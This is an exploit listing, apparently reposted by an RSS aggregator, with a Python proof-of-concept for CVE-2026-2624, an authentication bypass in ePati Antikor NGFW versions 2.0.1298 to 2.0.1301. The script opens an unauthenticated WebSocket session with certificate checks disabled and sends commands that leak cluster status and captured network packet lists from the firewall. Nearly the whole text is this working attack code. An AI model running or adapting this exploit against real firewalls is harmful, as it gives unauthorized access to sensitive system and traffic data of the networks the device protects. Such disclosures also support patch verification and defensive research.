# Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass # Date: 2026-04-13 # Exploit Author: [SADIK ERTÜRK] # Vendor Homepage: https://www.epati.com.tr/ # Software Link: https://www.epati.com.tr/antikor-ngfw/ # Version: v.2.0.1298 - v.2.0.1301 # Tested on: Linux / Antikor OS # CVE: CVE-2026-2624 import websocket import json import ssl import sys import argparse import random import string import time def banner(): print("-" * 65) print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit") print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]") print("-" * 65) def generate_random_id(length=8): """Generates a random session ID for the SockJS connection.""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def exploit(target_ip, target_port): # Generating random server and session IDs for SockJS server_id = random.randint(100, 999) session_id = generate_random_id() ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket" print(f"[*] Target WebSocket URL created: {ws_url}") print("[*] Connecting to the target... (Ignoring SSL certificate warnings)") try: # Bypassing Self-Signed SSL certificate verifications ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE}) ws.connect(ws_url) print("[+] Connection Successful! (Authentication bypassed)\n") # Payload 1: Listening to Cluster and System Status payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"]) print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...") ws.send(payload_1) # Wait for the response from the server time.sleep(1) response_1 = ws.recv() if response_1: print("[+] SUCCESSFUL! Sensitive system data successfully leaked:") print(f"> {response_1}\n") # Payload 2: Listening to Network Packets payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"]) print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...") ws.send(payload_2) time.sleep(1) response_2 = ws.recv() if response_2: print("[+] Network packet data captured:") print(f"> {response_2}\n") print("[*] Exploitation complete. Closing connection.") ws.close() except websocket.WebSocketException as e: print(f"[-] WebSocket Error: {e}") print("[-] The target might be patched (v.2.0.1302+) or the port is closed.") sys.exit(1) except Exception as e: print(f"[-] An unexpected error occurred: {e}") sys.exit(1) if __name__ == "__main__": banner() # Argument parsing parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC") parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)") parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)") args = parser.parse_args() exploit(args.target, args.port)
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。